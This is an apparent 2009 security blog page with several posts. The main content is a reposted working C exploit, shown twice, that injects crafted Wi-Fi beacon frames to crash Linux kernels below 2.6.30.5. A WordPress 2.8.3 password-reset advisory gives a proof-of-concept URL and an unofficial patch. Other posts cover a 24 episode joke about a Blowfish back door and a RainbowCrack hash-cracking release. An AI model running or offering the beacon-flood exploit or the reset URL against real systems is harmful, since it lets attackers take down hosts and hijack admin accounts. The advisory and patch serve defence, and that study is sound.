Posted: August 19th, 2009 | Author: xanda | Filed under: IT Related | Tags: back door, Blowfish, Bruce Schneier, crack | 1 Comment »
In last night’s episode of Fox’s thriller show, 24, there is a reference to the Blowfish algorithm which was designed by Bruce Schneier. On the show, an email message that contains the expected location of Jack Bauer is encrypted using Blowfish. The FBI intercepts the message and must decrypt it if they are to find him. I was curious to see what the 24 writers had up their sleeve. The answer: the designer of Blowfish put in a back door which was known to a former CTU operative. The FBI had leverage over the former CTU man because his wife was being held and faced at least 15 years in prison. The cipher was broken in seconds. Thanks a lot, Bruce! Thanks to your back door, Bauer is now being chased as a wanted man … at least until next week.
[Source: Avi Rubin]
Posted: August 18th, 2009 | Author: xanda | Filed under: IT Related | Tags: 2.6.30.5, exploit, kernel, linux, remote | No Comments »
In case you guys haven’t notice about this vulnerability
/*
* cfg80211-remote-dos.c
*
* Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://patchwork.kernel.org/patch/41218/
*
* These pointers can be NULL, the is_mesh() case isn't ever hit in the
* current kernel, but cmp_ies() can be hit under certain conditions.
*
* Usage:
*
* $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
* $ airmon-ng start wlan0
* ...
* $ ./cfg80211-remote-dos mon0 mac80211
* [+] Initializing interface mon0...
* [+] Injecting crafted DoS beacon frames...
*
* Notes:
*
* The NULL pointer dereference is triggered if the victim scans and receives
* a beacon frame that does not contain a SSID IE and then receives another
* one that does have a SSID IE. Raw frame injection via LORCON is required
* on the wireless interface. This should only affect the 2.6.30 series.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#define BEACON_NOSSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
#define BEACON_SSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x00\x03\x44\x6f\x53" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
void
usage(char **argv)
{
int i;
struct tx80211_cardlist *cardlist;
printf("Usage: %s [interface] [drivername]\n", argv[0]);
cardlist = tx80211_getcardlist();
if (cardlist == NULL) {
printf("Error accessing supported cardlist.\n");
} else {
printf("\nSupported drivers are: ");
for (i = 1; i < cardlist->num_cards; i++) {
printf("%s ", cardlist->cardnames[i]);
}
printf("\n");
}
tx80211_freecardlist(cardlist);
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
} |
/*
* cfg80211-remote-dos.c
*
* Linux Kernel < 2.6.30.5 cfg80211 Remote DoS
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Information:
*
* http://patchwork.kernel.org/patch/41218/
*
* These pointers can be NULL, the is_mesh() case isn't ever hit in the
* current kernel, but cmp_ies() can be hit under certain conditions.
*
* Usage:
*
* $ gcc cfg80211-remote-dos.c -o cfg80211-remote-dos -lorcon
* $ airmon-ng start wlan0
* ...
* $ ./cfg80211-remote-dos mon0 mac80211
* [+] Initializing interface mon0...
* [+] Injecting crafted DoS beacon frames...
*
* Notes:
*
* The NULL pointer dereference is triggered if the victim scans and receives
* a beacon frame that does not contain a SSID IE and then receives another
* one that does have a SSID IE. Raw frame injection via LORCON is required
* on the wireless interface. This should only affect the 2.6.30 series.
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include <time.h>
#include <tx80211.h>
#include <tx80211_packet.h>
#define BEACON_NOSSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_NOSSID_LEN 64
#define BEACON_SSID \
"\x80\x00\x00\x00\xff\xff\xff\xff\xff\xff" \
"\x00\x03\x52\x00\x00\x00" \
"\x00\x03\x52\x00\x00\x00" \
"\x30\x4b" \
"\x5f\x74\x34\x77\xdb\x03\x00\x00\x64\x00\x21\x04" \
"\x00\x03\x44\x6f\x53" \
"\x01\x08\x82\x84\x8b\x96\x0c\x12\x18\x24" \
"\x03\x01\x07" \
"\x05\x04\x00\x01\x01\x00" \
"\x2a\x01\x04" \
"\x32\x04\x30\x48\x60\x6c"
#define BEACON_SSID_LEN 69
void
usage(char **argv)
{
int i;
struct tx80211_cardlist *cardlist;
printf("Usage: %s [interface] [drivername]\n", argv[0]);
cardlist = tx80211_getcardlist();
if (cardlist == NULL) {
printf("Error accessing supported cardlist.\n");
} else {
printf("\nSupported drivers are: ");
for (i = 1; i < cardlist->num_cards; i++) {
printf("%s ", cardlist->cardnames[i]);
}
printf("\n");
}
tx80211_freecardlist(cardlist);
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
}
Source: Milw0rm
Posted: August 11th, 2009 | Author: xanda | Filed under: IT Related | Tags: 2.8.3, patch, Remote Admin Reset Password Vulnerability, wordpress | 6 Comments »
[at the time this entry was posted, this is still a 0day]
[level: medium]
For those who subscribe to Milw0rm’s RSS, you might have read about the WordPress <= 2.8.3 Remote Admin Reset Password Vulnerability earlier.
Let take a look at the vulnerable code in wp-login.php:
wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
$action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....
line 370:
break;
case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
break;
...[snip ]... |
wp-login.php:
...[snip]....
line 186:
function reset_password($key) {
global $wpdb;
$key = preg_replace('/[^a-z0-9]/i', '', $key);
if ( empty( $key ) )
return new WP_Error('invalid_key', __('Invalid key'));
$user = $wpdb->get_row($wpdb->prepare("SELECT * FROM $wpdb->users WHERE user_activation_key = %s", $key));
if ( empty( $user ) )
return new WP_Error('invalid_key', __('Invalid key'));
...[snip]....
line 276:
$action = isset($_REQUEST['action']) ? $_REQUEST['action'] : 'login';
$errors = new WP_Error();
if ( isset($_GET['key']) )
$action = 'resetpass';
// validate action so as to default to the login screen
if ( !in_array($action, array('logout', 'lostpassword', 'retrievepassword', 'resetpass', 'rp', 'register', 'login')) && false === has_filter('login_form_' . $action) )
$action = 'login';
...[snip]....
line 370:
break;
case 'resetpass' :
case 'rp' :
$errors = reset_password($_GET['key']);
if ( ! is_wp_error($errors) ) {
wp_redirect('wp-login.php?checkemail=newpass');
exit();
}
wp_redirect('wp-login.php?action=lostpassword&error=invalidkey');
exit();
break;
...[snip ]...
You can abuse the password reset function, and bypass the first step and
then reset the admin password by submiting an array to the $key
variable.
(Laurent GaffiƩ)
wanna see some PoC?
http://blog.example.com/wp-login.php?action=rp&key[]= |
http://blog.example.com/wp-login.php?action=rp&key[]=
Hehehe.. ok.. now lets patch it.. change the code in line 188 into the following code
if(is_array($key)) {
$key = '';
return new WP_Error('invalid_key', __('Invalid key'));
}
else
$key = preg_replace('/[^a-z0-9]/i', '', $key); |
if(is_array($key)) {
$key = '';
return new WP_Error('invalid_key', __('Invalid key'));
}
else
$key = preg_replace('/[^a-z0-9]/i', '', $key);
Now you are done.
P/S: This is not the official patch from WordPress. So far there is still no patch yet. You can temporarily use this method and please upgrade to the next version of WordPress when the patch is available. If you found that my patch is still vulnerable to this attack, kindly ‘patch’ me in the comment section
Greetz to Laurent GaffiƩ & Leong Jaan Yeh
Reference:
- http://www.milw0rm.com/exploits/9410
- http://my.php.net/is_array
The information contained within this advisory is supplied “as-is” with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.
Posted: July 26th, 2009 | Author: xanda | Filed under: IT Related | Tags: 2009, G10, G12, july, malsing, map, mapking, PC, R12 | 2 Comments »
Malsing Maps for Mapking G10/2007, R12 and PC is now updated [18 Jul 2009] and ready to be downloaded HERE
Posted: July 23rd, 2009 | Author: xanda | Filed under: IT Related | Tags: crack, hash, password, rainbow table, rainbowcrack | 2 Comments »
This version focus on more effective rainbow table file format. New features:
- New compact rainbow table file format (.rtc) reduce rainbow table size by 50% to 56.25%
- New rt2rtc utility convert rainbow table from raw file format (.rt) to compact file format (.rtc)
- New rtc2rt utility convert rainbow table from compact file format (.rtc) to raw file format (.rt)
- The rcrack/rcrack_cuda program support both .rt and .rtc rainbow table file format
- Conversion from non-perfect to perfect rainbow table is supported by rt2rtc utility
Smaller rainbow table significantly improve table lookup performance!
Introduction
RainbowCrack is a general propose implementation of Philippe Oechslin’s faster time-memory trade-off technique. It cracks hashes with rainbow tables.
Features:
- Full time-memory tradeoff tool suites, including rainbow table generation, sort, conversion and lookup
- Support rainbow table of any hash algorithm
- Support rainbow table of any charset
- Support rainbow table in raw file format (.rt) and compact file format (.rtc)
- Computation on multi-core processor support
- Computation on GPU (via NVIDIA CUDA technology) support (not freely available)
- Computation on multi-GPU (via NVIDIA CUDA technology) support (not freely available)
- Runs on Windows XP 32-bit and Windows Vista 32-bit
- Command line user interface
A brute force hash cracker generate all possible plaintexts and compute the corresponding hashes on the fly, and then compare the hashes with the target hash. The plaintext is found if one of them match, otherwise the intermediate computation results are discarded.
A time-memory tradeoff hash cracker need a precomputation stage, at the time all plaintext/hash pair within the selected hash algorithm, charset, plaintext length range are computed and the results are stored in files called rainbow table. It is time consuming to do this kind of computation. Once the one time precomputation is finished, hashes within the table can be cracked with much better performance than a brute force cracker.
Visit http://project-rainbowcrack.com/ for more information.
[img src]
